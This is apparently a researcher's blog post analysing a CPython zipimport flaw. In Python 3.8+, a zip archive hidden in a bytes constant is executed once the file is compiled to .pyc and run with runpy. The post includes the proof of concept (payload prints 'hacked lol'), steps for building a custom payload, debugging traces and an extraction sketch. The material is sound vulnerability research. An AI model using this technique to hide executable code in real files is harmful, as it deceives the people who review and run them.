# Python zipimport Module Injection Analysis

## Preface

While scrolling through Twitter I came across a curious piece of Python code [1]. This post documents the principle behind this still-unfixed vulnerability and the problems I ran into while debugging it.

## Vulnerability analysis

The proof-of-concept code posted on Twitter is:

```python
unused=b'\x50K\3\4'+b'\0'*26+b'+(\xca\xcc+\xd1P\xcfHL\xceNMQ\xc8\xc9\xcfQ\xd7\4\0PK\1\2'+b'\0'*6+b'\1'+b'\0'*9+b'\x15'+b'\0'*7+b'\13'+b'\0'*17+b'__\x6da\x69n__.\x70y\x50K\5\6'+b'\0'*8+b'9\0\0\0003\0\0\0'
i=__import__
i("runpy").run_path(i("py_compile").compile(__file__))
```

The intended behavior of this snippet is to compile its own source file into a .pyc file and then run that .pyc file. Under Python 3.7 the code raises an error, while under Python 3.8+ it prints `hacked lol`. Clearly Python 3.8+ mistakenly interprets the contents of `unused` as code and executes it.

The generated .pyc file looks like this:

```bash
$ xxd __pycache__/test.cpython-310.pyc
00000000: 6f0d 0d0a 0000 0000 e654 2164 1001 0000  o........T!d....
00000010: e300 0000 0000 0000 0000 0000 0000 0000  ................
00000020: 0005 0000 0040 0000 0073 2400 0000 6400  .....@...s$...d.
00000030: 5a00 6501 5a02 6502 6401 8301 a003 6502  Z.e.Z.e.d.....e.
00000040: 6402 8301 a004 6505 a101 a101 0100 6403  d.....e.......d.
00000050: 5300 2904 7380 0000 0050 4b03 0400 0000  S.).s....PK.....
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 002b 28ca cc2b d150 cf48  .......+(..+.P.H
00000080: 4cce 4e4d 51c8 c9cf 51d7 0400 504b 0102  L.NMQ...Q...PK..
00000090: 0000 0000 0000 0100 0000 0000 0000 0000  ................
000000a0: 1500 0000 0000 0000 0b00 0000 0000 0000  ................
000000b0: 0000 0000 0000 0000 0000 5f5f 6d61 696e  ..........__main
000000c0: 5f5f 2e70 7950 4b05 0600 0000 0000 0000  __.pyPK.........
000000d0: 0039 0000 0033 0000 00da 0572 756e 7079  .9...3.....runpy
000000e0: da0a 7079 5f63 6f6d 7069 6c65 4e29 06da  ..py_compileN)..
000000f0: 0675 6e75 7365 64da 0a5f 5f69 6d70 6f72  .unused..__impor
00000100: 745f 5fda 0169 da08 7275 6e5f 7061 7468  t__..i..run_path
00000110: da07 636f 6d70 696c 65da 085f 5f66 696c  ..compile..__fil
00000120: 655f 5fa9 0072 0900 0000 7209 0000 00fa  e__..r....r.....
00000130: 0774 6573 742e 7079 da08 3c6d 6f64 756c  .test.py..<modul
00000140: ...                                      e>....s.........
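00000150: 01
```

The `unused` bytes contain `PK\x03\x04`, which readers familiar with file formats will recognize as the local file header signature of a zip archive. Trying to decompress the payload with zlib (a `wbits` value of `-15` selects a raw deflate stream):

```bash
$ python3
Python 3.10.7 (main, Sep 8 2022, 14:34:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import zlib
>>> zlib.decompress(b'+(\xca\xcc+\xd1P\xcfHL\xceNMQ\xc8\xc9\xcfQ\xd7\x04\x00',-15)
b"print('hacked lol')"
```

At this point we can infer the rough mechanism of the vulnerability: a constant stored inside the .pyc is wrongly recognized as a zip archive, and the data decompressed from it is executed as code.

A researcher [2] quickly located the Python code that unpacks zip files [3]. The git history shows that zipimport was rewritten in Python 3.8 [4], which is also why 3.7 is not affected.

## Debugging the vulnerability

To trace the call chain of the vulnerability, my first idea was to call `traceback.print_stack()` directly from the payload in `unused`. First build a zip archive: the target script must be renamed to `__main__.py` before zipping, otherwise execution of the pyc fails because `__main__.py` cannot be found. Then convert the archive to a bytes literal and substitute it for the value of `unused` in the original PoC. There is no need to hand-craft the first 30 bytes of the zip the way the original PoC does:

```bash
$ cat __main__.py
import traceback
traceback.print_stack()
$ xxd -p 1.zip
504b030414000000080064537d5636685d6922000000290000000b000000
5f5f6d61696e5f5f2e7079cbcc2dc82f2a5128294a4c4e4d4a4ccee682b3
f40a8a32f34ae28b4b806c0d4d2e00504b01021f0014000000080064537d
5636685d6922000000290000000b00240000000000000020000000000000
005f5f6d61696e5f5f2e70790a00200000000000010018005990b3f5e561
d9015990b3f5e561d901ed69b3f5e561d901504b05060000000001000100
5d0000004b0000000000
$ python3
Python 3.10.7 (main, Sep 8 2022, 14:34:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.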
>>> test="504b030414000000080064537d5636685d6922000000290000000b0000005f5f6d61696e5f5f2e7079cbcc2dc82f2a5128294a4c4e4d4a4ccee682b3f40a8a32f34ae28b4b806c0d4d2e00504b01021f0014000000080064537d5636685d6922000000290000000b00240000000000000020000000000000005f5f6d61696e5f5f2e70790a00200000000000010018005990b3f5e561d9015990b3f5e561d901ed69b3f5e561d901504b050600000000010001005d0000004b0000000000"
>>> print(bytes.fromhex(test))
b'PK\x03\x04\x14\x00\x00\x00\x08\x00dS}V6h]i"\x00\x00\x00)\x00\x00\x00\x0b\x00\x00\x00__main__.py\xcb\xcc-\xc8/*Q()JLNMJL\xce\xe6\x82\xb3\xf4\n\x8a2\xf3J\xe2\x8bK\x80l\rM.\x00PK\x01\x02\x1f\x00\x14\x00\x00\x00\x08\x00dS}V6h]i"\x00\x00\x00)\x00\x00\x00\x0b\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00__main__.py\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00Y\x90\xb3\xf5\xe5a\xd9\x01Y\x90\xb3\xf5\xe5a\xd9\x01\xedi\xb3\xf5\xe5a\xd9\x01PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00]\x00\x00\x00K\x00\x00\x00\x00\x00'
$ python3 ./test.py
  File "/mnt/d/./test.py", line 4, in <module>
    i("runpy").run_path(i("py_compile").compile(__file__))
  File "/usr/lib/python3.10/runpy.py", line 306, in run_path
    return _run_code(code, mod_globals, init_globals,
  File "/usr/lib/python3.10/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/mnt/d/./__pycache__/test.cpython-310.pyc/__main__.py", line 2, in <module>
```

The printed call stack was not what I expected: it shows nothing of the zipimport internals. So I downloaded the source code to debug it.

The CPython source used for debugging is version 3.8 (3205d1fbbbfcf613b74d236be9db7a8225f452ea). After building, I first tried to debug by adding log statements directly to zipimport.py. However, no matter how I modified zipimport.py, or even when I deleted the file, the output did not change and Python reported no error. Searching for zipimport-related code turned up this:

```bash
~/cpython$ head ./Python/importlib_zipimport.h
/* Auto-generated by Programs/_freeze_importlib.c */
const unsigned char _Py_M__zipimport[] = {
    99,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,4,0,0,0,64,0,0,0,115,82,1,0,0,100,0,
```

zipimport is serialized to bytecode at build time, that is, it is a frozen module. The frozen modules of this Python version are defined in frozen.c:

```c
//cpython/blob/3.8/Python/frozen.c#L31
static const struct _frozen _PyImport_FrozenModules[] = {
    /* importlib */
    {"_frozen_importlib", _Py_M__importlib_bootstrap,
        (int)sizeof(_Py_M__importlib_bootstrap)},
    {"_frozen_importlib_external", _Py_M__importlib_bootstrap_external,
        (int)sizeof(_Py_M__importlib_bootstrap_external)},
    {"zipimport", _Py_M__zipimport,
        (int)sizeof(_Py_M__zipimport)},
    /* Test module */
    {"__hello__", M___hello__, SIZE},
    /* Test package (negative size indicates package-ness) */
    {"__phello__", M___hello__, -SIZE},
    {"__phello__.spam", M___hello__, SIZE},
    {0, 0, 0} /* sentinel */
};
```

So after modifying zipimport.py, the frozen module has to be regenerated with `make regen-importlib`, followed by a fresh `make`.

Below is the output after adding log statements to zipimport.py, runpy.py and related files:

```bash
$ ./python ../test.py
in _read_directory
in _read_directory
in run_path importer:
in util.find_spec fullname:__main__
in util.find_spec parent_path:None
in get_filename
in _get_module_code
in _get_data
  File "../test.py", line 3, in <module>
    i("runpy").run_path(i("py_compile").compile(__file__))
  File "/home/fuzz/cpython/Lib/runpy.py", line 281, in run_path
    mod_name, mod_spec, code = _get_main_module_details()
  File "/home/fuzz/cpython/Lib/runpy.py", line 224, in _get_main_module_details
    return _get_module_details(main_name)
  File "/home/fuzz/cpython/Lib/runpy.py", line 133, in _get_module_details
    print("in get_module_details,spec:{spec},trace={trace}".format(spec=spec,trace=traceback.print_stack()))
in get_module_details,spec:ModuleSpec(name='__main__', loader=, origin='../__pycache__/test.cpython-38.pyc/__main__.py'),trace=None
in get_code
in _get_module_code
in _get_data
hacked lol
```

Alongside the log output I used gdb. After starting gdb, load `python-gdb.py` from the source tree. The `py-*` commands then become available; for example, `py-bt` prints the Python-level call stack at the current position.

The call stack is roughly as follows:

```
//https://github.com/python/cpython/blob/3.8/
runpy.run_path(py_compile.compile(__file__))
    importer = pkgutil.get_importer(path_name) //Lib/runpy.py#L255
        importer = path_hook(path_item) //Lib/pkgutil.py#L420
            zipimport.zipimporter.__init__(path_item) //Lib/zipimport.py#L63
                files = _read_directory(path) //Lib/zipimport.py#L94
    importer:
    mod_name, mod_spec, code = _get_main_module_details() //Lib/runpy.py#L278
        spec = importlib.util.find_spec(mod_name) //Lib/runpy.py#L130
            zipimport.get_filename()
                zipimport._get_module_code()
        code = loader.get_code(mod_name) //Lib/runpy.py#L155
            code = zipimport._get_module_code(self, fullname) //Lib/zipimport.py#L698
                data = zipimport._get_data(self.archive, toc_entry) //Lib/zipimport.py#L709
    runpy._run_code(code,...)
```

## Summary

This debugging session gave me more experience with debugging the Python source. From a bug-hunting perspective, code in rewritten modules deserves particular attention in the future, because a single commit with a large amount of code is more likely to introduce bugs. Thanks to 四哥 for the help and guidance during this debugging session; 四哥's own analysis of the vulnerability is linked below [6].

## References

[1] https://twitter.com/David3141593/status/1640115094255198208

[2] https://twitter.com/c3rb3ru5d3d53c/status/1640191261435985920

[3] https://github.com/python/cpython/blob/d08fb257698e3475d6f69bb808211d39e344e5b2/Lib/zipimport.py#L544-L569

[4] https://github.com/python/cpython/commit/79d1c2e6c9d1bc1cf41ec3041801ca1a2b9a995b

[5] https://github.com/python/cpython/issues/103051

[6] https://mp.weixin.qq.com/s/ss6Ty8DozrtTP0sM5XKdXw
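
## Appendix: walking the PoC bytes by hand

The zip layout discussed in the vulnerability analysis can be checked with a short sketch. This is not zipimport's code: `extract_first_entry` is a hypothetical helper written for this note, and it assumes (as the zlib experiment suggests) that a non-zero compression method can be treated as raw deflate. It finds the end-of-central-directory record by searching backwards, uses the stored directory size and offset to work out how many foreign bytes precede the archive, and then reads the first entry. The 40-byte prefix and the short suffix are made up and only stand in for the surrounding .pyc data.

```python
import struct
import zlib

# Payload copied verbatim from the PoC.
unused = (b'\x50K\3\4' + b'\0'*26
          + b'+(\xca\xcc+\xd1P\xcfHL\xceNMQ\xc8\xc9\xcfQ\xd7\4\0PK\1\2'
          + b'\0'*6 + b'\1' + b'\0'*9 + b'\x15' + b'\0'*7 + b'\13' + b'\0'*17
          + b'__\x6da\x69n__.\x70y\x50K\5\6' + b'\0'*8 + b'9\0\0\0003\0\0\0')


def extract_first_entry(blob):
    """Hypothetical helper: return (name, data) of the first zip entry in blob."""
    eocd = blob.rfind(b'PK\x05\x06')  # end-of-central-directory signature
    if eocd < 0:
        raise ValueError('no end-of-central-directory record found')
    # Central directory size and offset sit 12 bytes into the record.
    cd_size, cd_offset = struct.unpack_from('<LL', blob, eocd + 12)
    # Bytes placed in front of the archive shift every stored offset.
    shift = eocd - cd_size - cd_offset
    cd_pos = cd_offset + shift
    # Fixed 46-byte central directory file header.
    (sig, _made, _need, _flags, compress, _time, _date, _crc,
     csize, _usize, name_len, _extra, _comment, _disk, _iattr,
     _xattr, local_offset) = struct.unpack_from('<4s6H3L5H2L', blob, cd_pos)
    if sig != b'PK\x01\x02':
        raise ValueError('bad central directory signature')
    name = blob[cd_pos + 46:cd_pos + 46 + name_len].decode('ascii')
    local = local_offset + shift
    if blob[local:local + 4] != b'PK\x03\x04':
        raise ValueError('bad local file header signature')
    # The local header is 30 fixed bytes plus its own name and extra field.
    lname, lextra = struct.unpack_from('<HH', blob, local + 26)
    start = local + 30 + lname + lextra
    raw = blob[start:start + csize]
    # Assumption: any non-zero method is handled as raw deflate.
    data = raw if compress == 0 else zlib.decompress(raw, -15)
    return name, data


# Made-up prefix and suffix standing in for the rest of the .pyc file.
name, data = extract_first_entry(b'\xe3' + b'\0'*39 + unused + b'\xda\x05runpy')
print(name, data)
```

If the sketch is right, it recovers `__main__.py` and the same `print('hacked lol')` source that the zlib session produced, whatever surrounds the payload. That tolerance for leading and trailing bytes is what lets a zip hidden in a bytes constant survive compilation into a .pyc.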